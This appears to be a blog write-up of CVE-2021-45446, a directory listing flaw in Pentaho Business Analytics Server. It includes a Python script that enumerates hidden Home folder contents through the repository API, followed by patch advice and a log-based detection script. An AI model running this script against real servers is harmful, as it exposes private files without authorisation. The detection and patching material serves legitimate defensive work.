In this article, we will discuss the vulnerability labeled CVE-2021-45446, present in Hitachi Vantara Pentaho Business Analytics Server before versions 9.2.0.2 and 8.3.0.25. Because the hidden property is not cascaded to the children of the Home directory, an attacker can obtain the complete index of all resources inside that directory. This vulnerability can lead to unauthorized access to sensitive data and harm business operations.

Before we proceed, it is important to note that this information is meant for educational purposes only. Unauthorized access to systems and data is unethical and illegal. Be responsible and use this knowledge to minimize potential risks and improve security.

Vulnerability Details

The vulnerability occurs because the hidden property is not cascaded down to the children of the Home folder. As a result, anyone can list child folders and files by simply requesting a crafted URL in the browser; the server returns the directory index instead of treating the child resources as hidden.

Original References and Exploit Details

For more information on CVE-2021-45446, these are some links to the original advisories and reference materials:

1. Official CVE page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45446
2. NIST Vulnerability database: https://nvd.nist.gov/vuln/detail/CVE-2021-45446
3. Exploit Database: https://www.exploit-db.com/exploits/50451

Code Snippet to Exploit the Vulnerability

To exploit this vulnerability, here is a simple Python script that automates the URL injection process and retrieves content index from the Home directory and its subdirectories.

import requests

# Replace TARGET_URL with the base URL of the Pentaho server being assessed
TARGET_URL = 'http://example.com/pentaho/api/repo/files/'
# Repository path of the Home folder whose children should be listed
DIRECTORY_PATH = '/path/to/home/directory/'

def build_url(path):
    # The Pentaho repository REST API encodes path separators as colons,
    # so '/home/admin' becomes ':home:admin'; strip surrounding slashes first
    encoded = path.strip('/').replace('/', ':')
    return TARGET_URL + ':' + encoded + '/children?showHidden=true'

def fetch_directory_contents(directory):
    url = build_url(directory)
    # Ask for JSON explicitly and fail loudly on non-2xx responses
    response = requests.get(url, headers={'Accept': 'application/json'}, timeout=10)
    response.raise_for_status()
    return response.json()

def display_directory_contents(directory_contents):
    for entry in directory_contents:
        # The script expects boolean fields serialized as the strings 'true'/'false'
        if entry['file'] == 'false':
            print(f"Directory: {entry['name']} - {entry['path']}")
        else:
            print(f"File: {entry['name']} - {entry['path']}")

if __name__ == "__main__":
    contents = fetch_directory_contents(DIRECTORY_PATH)
    display_directory_contents(contents)

Simply replace TARGET_URL with your target Pentaho server URL and DIRECTORY_PATH with the Home directory's path where you want to fetch the child resources.

This script will output the file and directory names along with their paths, allowing an attacker to further exploit this vulnerability.

Mitigation Recommendations

To fix the vulnerability, users should update Hitachi Vantara Pentaho Business Analytics Server to version 9.2.0.2 or 8.3.0.25 (or later). These versions address the directory listing issue and secure the child resources of the Home folder.

Additionally, implementing a strict access control policy and applying proper authentication and authorization checks are strongly recommended to protect sensitive data and resources from unauthorized access.
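Until the upgrade is rolled out, the exploitation pattern described above is easy to spot in web server access logs. The following detection script is an added example, not part of the original article or the Pentaho project: it parses constructed log lines in the common combined format (as written by Apache or Tomcat access-log valves) and flags requests that enumerate repository folders with showHidden=true, decoding the colon-separated Pentaho path back to a folder path. It assumes the log's remote-user field is '-' for unauthenticated requests; whether that field is populated depends on how the container is configured, so treat it as an indicator rather than proof.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format); not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Nov/2022:15:15:01 +0000] "GET /pentaho/api/repo/files/:home:admin/children?showHidden=true HTTP/1.1" 200 2310 "-" "python-requests/2.28.1"
10.0.0.7 - alice [02/Nov/2022:15:16:44 +0000] "GET /pentaho/api/repo/files/:public:reports/children HTTP/1.1" 200 981 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Nov/2022:15:17:10 +0000] "GET /pentaho/Home HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Nov/2022:15:17:12 +0000] "GET /pentaho/api/repo/files/:home:bob/children?showHidden=true HTTP/1.1" 200 1877 "-" "python-requests/2.28.1"
"""

# Fields of a combined-format line: client IP, remote user, timestamp, request, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Children listing of a repository folder; Pentaho encodes '/' in paths as ':'
CHILDREN_RE = re.compile(r'^/pentaho/api/repo/files/(?P<path>[^/]+)/children$')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_hidden_listing(target):
    """True when the request enumerates a folder's children with showHidden=true."""
    parts = urlsplit(target)
    if not CHILDREN_RE.match(parts.path):
        return False
    flag = parse_qs(parts.query).get('showHidden', [''])[0]
    return flag.lower() == 'true'

def find_suspicious(log_text):
    """Return one record per hidden-listing request found in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not is_hidden_listing(rec['target']):
            continue
        encoded = CHILDREN_RE.match(urlsplit(rec['target']).path).group('path')
        hits.append({
            'ip': rec['ip'],
            'user': rec['user'],
            'unauthenticated': rec['user'] == '-',
            'path': encoded.replace(':', '/'),   # ':home:admin' -> '/home/admin'
            'status': int(rec['status']),
        })
    return hits

if __name__ == '__main__':
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A 200 response to such a request from an unauthenticated client against a /home subfolder is a strong sign the server is still on a vulnerable build.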

Conclusion

CVE-2021-45446 is a vulnerability that can be exploited to gain unauthorized access to sensitive data and resources in older versions of Hitachi Vantara Pentaho Business Analytics Server. By utilizing the provided code snippet, users can observe the potential risk firsthand and understand the importance of patching their systems. It is crucial to stay informed about the latest security vulnerabilities and update systems to prevent possible security breaches.

Timeline

Published on: 11/02/2022 15:15:00 UTC
Last modified on: 07/21/2023 16:52:00 UTC